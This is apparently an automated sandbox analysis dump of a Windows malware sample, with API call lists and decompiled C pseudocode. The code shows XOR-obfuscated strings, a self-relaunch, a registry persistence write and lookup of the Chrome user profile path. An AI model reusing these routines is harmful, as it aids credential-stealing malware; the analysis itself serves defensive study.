                                                                • GetUserNameA.ADVAPI32(?,?), ref: 010932AC
                                                                  • Part of subcall function 01094615: _Deallocate.LIBCONCRT ref: 01094624
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: CountDeallocateNameTickUser
                                                                • String ID: *$+"52'1$/1'-
                                                                • API String ID: 1504973654-1671824692
                                                                • Opcode ID: 540dacbd8a233d6aac180bba45fa983e6c55d7eceb8c27259b0ab49619979ca8
                                                                • Instruction ID: 5665b9226c7a58c5a7fb22388673f6da27ca528b45f1e3132994ba3ee22a68d7
                                                                • Opcode Fuzzy Hash: 540dacbd8a233d6aac180bba45fa983e6c55d7eceb8c27259b0ab49619979ca8
                                                                • Instruction Fuzzy Hash: EEF164711083829BCB29EF24C9A4AEFB7E5BFA9304F444A1DE0C987251DF31554ADB53
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 01096A8F: __EH_prolog.LIBCMT ref: 01096A94
                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,010CB844,00000000,00000000,?,0000000F,00000000), ref: 010A59CF
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 010A5A78
                                                                  • Part of subcall function 010A60BC: _memcmp.LIBVCRUNTIME ref: 010A60E2
                                                                • FindClose.KERNELBASE(00000000), ref: 010A5A87
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext_memcmp
                                                                • String ID:
                                                                • API String ID: 1302757292-0
                                                                • Opcode ID: 8fe06f7b200b58aeda844a8e9ef8c88a1dde00a3822bf2e3253914ba191ff7fd
                                                                • Instruction ID: 0bd86e44652cdd0c9729c57a02d919b6050ade2da723ca252b3d3bd3565649fb
                                                                • Opcode Fuzzy Hash: 8fe06f7b200b58aeda844a8e9ef8c88a1dde00a3822bf2e3253914ba191ff7fd
                                                                • Instruction Fuzzy Hash: DF41EB70A1021E9FDF14DF94C9A5DEEB7B4FF24604F84056DE586A3190EB306A4ACB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetSystemInfo.KERNELBASE(010D5318,00000000,01090CE8,0000000F,00000010,?,?), ref: 01046F5E
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: ffbc0d0f34ad12ef5533244f4ef673cc6514503397d71db2691f43a405d05d28
                                                                • Instruction ID: ee507254c407538baff15901d4592b904fdaa17f6563d52da4c5082b0e526c30
                                                                • Opcode Fuzzy Hash: ffbc0d0f34ad12ef5533244f4ef673cc6514503397d71db2691f43a405d05d28
                                                                • Instruction Fuzzy Hash: 7CE0DFB639434127F52432BDFC42F9A314687A0F50F60083EB6C8C90C5EED180410411
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 90%
                                                                			E010A5763() {
                                                                				char _v1048;
                                                                				char _v1568;
                                                                				char _v1636;
                                                                				char _v1640;
                                                                				void* _v1644;
                                                                				char _v1660;
                                                                				char _v1664;
                                                                				void* _v1676;
                                                                				short _v1678;
                                                                				void* _v1680;
                                                                				intOrPtr _v1684;
                                                                				intOrPtr _v1688;
                                                                				intOrPtr _v1692;
                                                                				intOrPtr _v1696;
                                                                				intOrPtr _v1700;
                                                                				intOrPtr _v1704;
                                                                				intOrPtr _v1708;
                                                                				intOrPtr _v1712;
                                                                				intOrPtr _v1716;
                                                                				intOrPtr _v1720;
                                                                				intOrPtr _v1724;
                                                                				intOrPtr _v1728;
                                                                				intOrPtr _v1732;
                                                                				intOrPtr _v1736;
                                                                				intOrPtr _v1740;
                                                                				intOrPtr _v1744;
                                                                				intOrPtr _v1748;
                                                                				intOrPtr _v1752;
                                                                				intOrPtr _v1756;
                                                                				intOrPtr _v1760;
                                                                				intOrPtr _v1764;
                                                                				intOrPtr _v1768;
                                                                				intOrPtr _v1772;
                                                                				intOrPtr _v1776;
                                                                				intOrPtr _v1780;
                                                                				intOrPtr _v1784;
                                                                				intOrPtr _v1788;
                                                                				intOrPtr _v1792;
                                                                				char _v1796;
                                                                				void* __edi;
                                                                				signed int _t80;
                                                                				void* _t84;
                                                                				signed int _t90;
                                                                				void* _t93;
                                                                
                                                                				_push(_t84);
                                                                				_t1 =  &_v1636; // 0x11223420
                                                                				E01024A10(_t84, _t1, 0, 0x44);
                                                                				_v1796 = 0xe22ce223;
                                                                				_v1792 = 0xe26de226;
                                                                				asm("stosd");
                                                                				_t93 = (_t90 & 0xfffffff8) - 0x704 + 0xc;
                                                                				_v1788 = 0xe23de221;
                                                                				_v1784 = 0xe267e223;
                                                                				_t80 = 0;
                                                                				_v1780 = 0xe20ae267;
                                                                				asm("stosd");
                                                                				_v1776 = 0xe23be26a;
                                                                				_v1772 = 0xe223e225;
                                                                				_v1768 = 0xe26fe229;
                                                                				asm("stosd");
                                                                				_v1764 = 0xe27fe261;
                                                                				_v1760 = 0xe27de263;
                                                                				_v1756 = 0xe27be265;
                                                                				asm("stosd");
                                                                				_v1752 = 0xe277e267;
                                                                				_v1748 = 0xe237e275;
                                                                				_v1744 = 0xe26ae27a;
                                                                				_v1740 = 0xe270e27c;
                                                                				_v1736 = 0xe27fe229;
                                                                				_v1732 = 0xe251e253;
                                                                				_v1728 = 0xe253e252;
                                                                				_v1724 = 0xe25be244;
                                                                				_v1720 = 0xe229e246;
                                                                				_v1716 = 0xe205e21d;
                                                                				_v1712 = 0xe24de24a;
                                                                				_v1708 = 0xe229e24c;
                                                                				_v1704 = 0xe203e20b;
                                                                				_v1700 = 0xe25ee250;
                                                                				_v1696 = 0xe253e214;
                                                                				_v1692 = 0xe204e25b;
                                                                				_v1688 = 0xe255e256;
                                                                				_v1684 = 0xe20ae25d;
                                                                				_v1680 = 0xe258;
                                                                				do {
                                                                					_t33 = _t80 - 0x1dc0; // -7616
                                                                					 *(_t93 + 0x10 + _t80 * 2) =  *(_t93 + 0x10 + _t80 * 2) ^ _t33;
                                                                					_t80 = _t80 + 1;
                                                                				} while (_t80 < 0x3b);
                                                                				_t40 =  &_v1660; // 0x11223408
                                                                				_v1678 = 0;
                                                                				_t42 =  &_v1796; // 0x11223380
                                                                				E010943E9(_t40, _t42);
                                                                				_t43 =  &_v1568; // 0x11223464
                                                                				GetModuleFileNameW(0, _t43, 0x104);
                                                                				_t45 =  &_v1568; // 0x11223468
                                                                				_t46 =  &_v1664; // 0x11223408
                                                                				_t65 =  >=  ? _v1664 : _t46;
                                                                				_t48 =  &_v1048; // 0x11223670
                                                                				E010A543D(_t48, 0x208,  >=  ? _v1664 : _t46, _t45);
                                                                				_t49 =  &_v1680; // 0x112233f8
                                                                				_t50 =  &_v1640; // 0x11223420
                                                                				_t51 =  &_v1048; // 0x11223670
                                                                				GetProcAddress(LoadLibraryA("Kernel32.dll"), "CreateProcessW"); // executed
                                                                				CreateProcessW(0, _t51, 0, 0, 0, 0x8000000, 0, 0, _t50, _t49); // executed
                                                                				CloseHandle(_v1676);
                                                                				CloseHandle(_v1680);
                                                                				_t54 =  &_v1664; // 0x11223408
                                                                				return E01094572(_t54);
                                                                			}

                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,11223464,00000104,11223380), ref: 010A58C7
                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,CreateProcessW,00000000,11223670,00000000,00000000,00000000,08000000,00000000,00000000,11223420,112233F8), ref: 010A592F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A5936
                                                                • CreateProcessW.KERNELBASE ref: 010A593C
                                                                • CloseHandle.KERNEL32(?), ref: 010A594B
                                                                • CloseHandle.KERNEL32(?), ref: 010A5954
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                 • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: CloseHandle$AddressCreateFileLibraryLoadModuleNameProcProcess
                                                                • String ID: !=$#g$%#$)o$CreateProcessW$D[$F)$JM$Kernel32.dll$L)$P^$RS$SQ$VU$X$]$c}$e{$g$gw$j;$u7$zj$|p
                                                                • API String ID: 2397788181-986300883
                                                                • Opcode ID: 8832d771fe92c22305b0076beb5ad62e7ec5f776573f2e2c4024c946b16e4b2f
                                                                • Instruction ID: 7afec9ae6a3576b995c30bba3f5fe081efb0f34029e8a927a5b4fb6d5c266962
                                                                • Opcode Fuzzy Hash: 8832d771fe92c22305b0076beb5ad62e7ec5f776573f2e2c4024c946b16e4b2f
                                                                • Instruction Fuzzy Hash: BD4128B95087809FD320DF94DA84A9BBBE8FF84740F508A6DF2D88A250D7789509CF53
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 91%
                                                                			E010210E6() {
                                                                				void* _v8;
                                                                				void* _v12;
                                                                				char _v13;
                                                                				intOrPtr _v17;
                                                                				char _v21;
                                                                				int _v28;
                                                                				int _v32;
                                                                				char _v48;
                                                                				char _v72;
                                                                				long _t28;
                                                                				long _t34;
                                                                				long _t37;
                                                                				int _t42;
                                                                				void* _t55;
                                                                
                                                                				_push(0xa);
                                                                				if(E010AE087(0x10ccfc8, 0, _t55) > 0x12c) {
                                                                					E010A47F9( &_v72);
                                                                					_t42 = 0;
                                                                					_v32 = 0;
                                                                					_v28 = 0;
                                                                					E01094728( &_v48, 0x10ccef0);
                                                                					_v12 = 0;
                                                                					_v8 = 0;
                                                                					_v21 = 0x17040e13;
                                                                					_v17 = 0x2140413;
                                                                					_v13 = 0;
                                                                					_t28 = RegOpenKeyExA(0x80000002, E01045084( &_v21), 0, 0x20006,  &_v12); // executed
                                                                					__eflags = _t28;
                                                                					if(_t28 == 0) {
                                                                						__eflags =  *0x10ccea4 - 0x10;
                                                                						_t33 =  >=  ?  *0x10cce90 : 0x10cce90;
                                                                						_t34 = RegCreateKeyA(_v12,  >=  ?  *0x10cce90 : 0x10cce90,  &_v8); // executed
                                                                						__eflags = _t34;
                                                                						if(_t34 == 0) {
                                                                							__eflags = _v28 - 0x10;
                                                                							_t53 =  >=  ? _v48 :  &_v48;
                                                                							_t42 = 1;
                                                                							_t37 = RegSetValueExA(_v8, "name", 0, 1,  >=  ? _v48 :  &_v48, _v32 + 1); // executed
                                                                							__eflags = _t37;
                                                                							if(_t37 != 0) {
                                                                								_t42 = 0;
                                                                								__eflags = 0;
                                                                							} else {
                                                                								RegCloseKey(_v8);
                                                                								RegCloseKey(_v12);
                                                                							}
                                                                						}
                                                                					}
                                                                					E01094615( &_v48);
                                                                					E01094615( &_v72);
                                                                					return _t42;
                                                                				} else {
                                                                					return 0;
                                                                				}
                                                                			}
 
                                                                 Instruction address column of the disassembly listing (instruction text not recovered): 0x010210f3 to 0x010211d3, with the early-return path at 0x01021102 to 0x01021105

                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,00020006,?,010CCEF0), ref: 01021153
                                                                • RegCreateKeyA.ADVAPI32(?,010CCE90,?), ref: 01021178
                                                                • RegSetValueExA.KERNELBASE(?,name,00000000,00000001,?,?), ref: 0102119F
                                                                • RegCloseKey.ADVAPI32(?), ref: 010211AC
                                                                • RegCloseKey.ADVAPI32(?), ref: 010211B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                 • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: Close$CreateOpenValue
                                                                • String ID: name
                                                                • API String ID: 678895439-1579384326
                                                                • Opcode ID: b93378b51862a96836777669fb3e5380cf8a50ae92e766a66c07d60f87958ed7
                                                                • Instruction ID: fa9330f4e8e7d7e8b335febe59e8a265f97ccf56c288de5713ce2889776dbe87
                                                                • Opcode Fuzzy Hash: b93378b51862a96836777669fb3e5380cf8a50ae92e766a66c07d60f87958ed7
                                                                • Instruction Fuzzy Hash: B3216D70A40209EFEF24DFE8D995EEEBBB9FB18304F50406CE586A2140EB715A45DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E01095671(void* __edi) {
                                                                				char _v524;
                                                                				struct HINSTANCE__* _t7;
                                                                				_Unknown_base(*)()* _t8;
                                                                				void* _t9;
                                                                				void* _t13;
                                                                
                                                                				E01024A10(__edi,  &_v524, 0, 0x208);
                                                                				_t7 = LoadLibraryA("Shell32.dll"); // executed
                                                                				_t8 = GetProcAddress(_t7, "SHGetSpecialFolderPathW"); // executed
                                                                				_t9 =  *_t8(0,  &_v524, 0x1c, 1); // executed
                                                                				if(_t9 != 0) {
                                                                					E01096B00(_t13, 0x10d5618, 0x104, L"%s\\Google\\Chrome\\User Data\\Default",  &_v524);
                                                                					return 0x10d5618;
                                                                				} else {
                                                                					return _t9;
                                                                				}
                                                                			}
 
                                                                 Instruction address column of the disassembly listing (instruction text not recovered): 0x01095688 to 0x010956e0, with the early-return path at 0x010956bb

                                                                APIs
                                                                • LoadLibraryA.KERNELBASE(Shell32.dll,SHGetSpecialFolderPathW,00000000,?,0000001C,00000001), ref: 010956A7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010956AE
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default, xrefs: 010956C3, 010956D3
                                                                • %s\Google\Chrome\User Data\Default, xrefs: 010956C9
                                                                • SHGetSpecialFolderPathW, xrefs: 0109569D
                                                                • Shell32.dll, xrefs: 010956A2
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                 • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                 • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: %s\Google\Chrome\User Data\Default$C:\Users\user\AppData\Local\Google\Chrome\User Data\Default$SHGetSpecialFolderPathW$Shell32.dll
                                                                • API String ID: 2574300362-4211305373
                                                                • Opcode ID: 934468eacb9ac387e26c218c4c26e264b4daa7ec16ec6ab29c876b0129396e0e
                                                                • Instruction ID: 5711971e3de7fc3622d01c28d08de8232868b881d69fe4813b591f7875ffa20d
                                                                • Opcode Fuzzy Hash: 934468eacb9ac387e26c218c4c26e264b4daa7ec16ec6ab29c876b0129396e0e
                                                                • Instruction Fuzzy Hash: 41F054B1B8031967EA607264BC0AFDB326C4714A05F400154BAD9F61C6F9D5D6444AD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E010AE836(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                				char _v5;
                                                                				short _v6;
                                                                				intOrPtr _v9;
                                                                				intOrPtr _v10;
                                                                				intOrPtr _v14;
                                                                				char _v18;
                                                                				char _v20;
                                                                				char _v25;
                                                                				char _v28;
                                                                				char _v29;
                                                                				char _v33;
                                                                				intOrPtr _v40;
                                                                				intOrPtr _v44;
                                                                				intOrPtr _v48;
                                                                				char _v52;
                                                                				char _v56;
                                                                				char _v60;
                                                                				char _v64;
                                                                				intOrPtr _v68;
                                                                				char _v72;
                                                                				char _v88;
                                                                				intOrPtr _v92;
                                                                				signed int _v96;
                                                                				char _v112;
                                                                				intOrPtr _v116;
                                                                				signed int _v120;
                                                                				char _v136;
                                                                				char _v160;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed int _t81;
                                                                				intOrPtr* _t84;
                                                                				intOrPtr _t85;
                                                                				intOrPtr* _t87;
                                                                				intOrPtr _t88;
                                                                				intOrPtr _t91;
                                                                				void* _t100;
                                                                				signed int _t126;
                                                                				intOrPtr _t127;
                                                                				void* _t128;
                                                                				signed int _t132;
                                                                				intOrPtr* _t135;
                                                                				intOrPtr* _t139;
                                                                				char _t142;
                                                                				intOrPtr* _t143;
                                                                				signed int _t163;
                                                                				void* _t170;
                                                                				signed int _t171;
                                                                				void* _t175;
                                                                				intOrPtr _t178;
                                                                				void* _t180;
                                                                				void* _t181;
                                                                				void* _t182;
                                                                				intOrPtr _t184;
                                                                				intOrPtr _t185;
                                                                				void* _t186;
                                                                
                                                                				_t170 = __edx;
                                                                				_v40 = __ecx;
                                                                				E010AE466( &_v52, __eflags); // executed
                                                                				E010AE67A( &_v160, _t170); // executed
                                                                				_t178 = _v52;
                                                                				_v64 = 0;
                                                                				_v60 = 0;
                                                                				_v56 = 0;
                                                                				_t81 = _v48 - _t178;
                                                                				asm("cdq");
                                                                				_t132 = 0x18;
                                                                				_t171 = _t81 % _t132;
                                                                				_t126 = _t81 / _t132;
                                                                				_t188 = _t126;
                                                                				if(_t126 != 0) {
                                                                					_t185 = _t178;
                                                                					_t180 = _t132;
                                                                					do {
                                                                						_v20 = 6;
                                                                						E010931DE( &_v20, _t171, _t188, _t185);
                                                                						E010A9228( &_v64,  &_v20);
                                                                						E010A832E(_t126,  &_v20);
                                                                						_t185 = _t185 + _t180;
                                                                						_t126 = _t126 - 1;
                                                                					} while (_t126 != 0);
                                                                					_t178 = _v52;
                                                                				}
                                                                				_t127 = _v40;
                                                                				E010A8186(_t127);
                                                                				_v18 = 0x37313833;
                                                                				_v14 = 0x22102821;
                                                                				_v10 = 0x24233a3a;
                                                                				_v6 = 0x22;
                                                                				_t84 = E0104515C( &_v18);
                                                                				_v120 = _v120 & 0x00000000;
                                                                				_t172 = _t84;
                                                                				_t135 = _t84;
                                                                				_v116 = 0xf;
                                                                				_v136 = 0;
                                                                				_t29 = _t135 + 1; // 0x1
                                                                				_t181 = _t29;
                                                                				do {
                                                                					_t85 =  *_t135;
                                                                					_t135 = _t135 + 1;
                                                                				} while (_t85 != 0);
                                                                				E01094686( &_v136, _t172, _t135 - _t181);
                                                                				_v33 = 0x3021202d;
                                                                				_v29 = 0;
                                                                				_t87 = E010450F0( &_v33);
                                                                				_v96 = _v96 & 0x00000000;
                                                                				_t173 = _t87;
                                                                				_t139 = _t87;
                                                                				_v92 = 0xf;
                                                                				_v112 = 0;
                                                                				_t38 = _t139 + 1; // 0x1
                                                                				_t182 = _t38;
                                                                				do {
                                                                					_t88 =  *_t139;
                                                                					_t139 = _t139 + 1;
                                                                				} while (_t88 != 0);
                                                                				E01094686( &_v112, _t173, _t139 - _t182);
                                                                				asm("movaps xmm0, [0x10bd1d0]");
                                                                				asm("movups [ebp-0x15], xmm0");
                                                                				_v9 = 0x2137333d;
                                                                				_t142 = 0;
                                                                				_v5 = 0;
                                                                				do {
                                                                					_t42 = _t142 + 0x40; // 0x40
                                                                					 *(_t186 + _t142 - 0x15) =  *(_t186 + _t142 - 0x15) ^ _t42;
                                                                					_t142 = _t142 + 1;
                                                                				} while (_t142 < 0x14);
                                                                				_t143 =  &_v25;
                                                                				_v5 = 0;
                                                                				_v72 = 0;
                                                                				_v88 = 0;
                                                                				_t175 = _t143 + 1;
                                                                				_v68 = 0xf;
                                                                				do {
                                                                					_t91 =  *_t143;
                                                                					_t143 = _t143 + 1;
                                                                					_t196 = _t91;
                                                                				} while (_t91 != 0);
                                                                				E01094686( &_v88,  &_v25, _t143 - _t175);
                                                                				_t146 =  &_v28;
                                                                				_push(E010AE0E2( &_v28, _t196));
                                                                				E0109478A(E0109478A(_t127, _t175,  &_v136), _t175, _t146);
                                                                				E01094615( &_v28);
                                                                				_t100 = E0109478A(_t127, _t175,  &_v112);
                                                                				_v20 = 6;
                                                                				E010A7C71( &_v20, _t175, _t196,  &_v64);
                                                                				E010A900F(_t100, _t175,  &_v20);
                                                                				_t154 =  &_v20;
                                                                				E010A832E(_t127,  &_v20);
                                                                				_push( &_v160);
                                                                				E0109478A(E0109478A(_t127, _t175,  &_v88), _t175, _t154);
                                                                				E01094615( &_v88);
                                                                				E01094615( &_v112);
                                                                				E01094615( &_v136);
                                                                				E010A8505(_t127,  &_v64, _t178);
                                                                				E01094615( &_v160);
                                                                				if(_t178 != 0) {
                                                                					_t184 = _t178;
                                                                					if(_t184 != _v48) {
                                                                						_t128 = 0x18;
                                                                						do {
                                                                							E01094615(_t184);
                                                                							_t184 = _t184 + _t128;
                                                                						} while (_t184 != _v48);
                                                                						_t127 = _v40;
                                                                					}
                                                                					_t163 = 0x18;
                                                                					asm("cdq");
                                                                					E01094A9F(_t127, _t178, _t178, (_v44 - _t178) / _t163 * 0x18);
                                                                				}
                                                                				return _t127;
                                                                			}


                                                                APIs
                                                                  • Part of subcall function 010AE466: _Deallocate.LIBCONCRT ref: 010AE66C
                                                                  • Part of subcall function 010AE67A: CreateFileW.KERNELBASE(E21DE21C,00000000,00000003,00000000,00000003,00000000,00000000,?,00000000,?), ref: 010AE6F1
                                                                • _Deallocate.LIBCONCRT ref: 010AEA66
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: Deallocate$CreateFile
                                                                • String ID: - !0$3817$::#$$=37!
                                                                • API String ID: 3647614243-2413464419
                                                                • Opcode ID: ecd102a452c6f8ba7e7e5ea4fddeb4cbd5d27e5235e2515ab56df18a869eff5c
                                                                • Instruction ID: 641b438420c8bbe68835badbda8eb786c1fa0bdd588ae89177464cf79ebfbb6c
                                                                • Opcode Fuzzy Hash: ecd102a452c6f8ba7e7e5ea4fddeb4cbd5d27e5235e2515ab56df18a869eff5c
                                                                • Instruction Fuzzy Hash: 6361C671D0010A9BDF18EFE8C994AEDB7B9AF58304F50816DD445A7281EF315A09CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 01039FA4
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0103A012
                                                                  • Part of subcall function 01039EB7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01036B39,?,00000000,00000000), ref: 01039F59
                                                                  • Part of subcall function 01035710: RtlAllocateHeap.NTDLL(00000000,010227CC,00000000,?,01024253,00000002,00000000,010A4A32,?,?,01097AEE,010227CC,00000004,00000000,00000000,00000000), ref: 01035742
                                                                • _free.LIBCMT ref: 0103A003
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                • String ID:
                                                                • API String ID: 2560199156-0
                                                                • Opcode ID: 797fb5c7fe3913ca8b973c3c557863a93fa7842891e7b86ff9158ca0e6e11b68
                                                                • Instruction ID: dfe44b6d7d1f6c5d1ea2e9671c06553218f260294e39412cb0ff3fe567c75d02
                                                                • Opcode Fuzzy Hash: 797fb5c7fe3913ca8b973c3c557863a93fa7842891e7b86ff9158ca0e6e11b68
                                                                • Instruction Fuzzy Hash: 4401A7B2B05616BB773155BE5C88DBFADADDED7B543040169FEC4C7200EE668D0191B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0104B2B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID: winRead
                                                                • API String ID: 2738559852-2759563040
                                                                • Opcode ID: ad67a4a625d8797abf6181b66a1ed2817bf85780d64875405dd92b7afa9590df
                                                                • Instruction ID: 727fbaccd741730a5d7e3237b8d89eca0591f5fd9c52cade8396799c0e1a544b
                                                                • Opcode Fuzzy Hash: ad67a4a625d8797abf6181b66a1ed2817bf85780d64875405dd92b7afa9590df
                                                                • Instruction Fuzzy Hash: 0341BFB2A00209AFDB24DFA8CDC5AEE77B5FF84314F148569F885A7640E730F9458B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0104B1B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
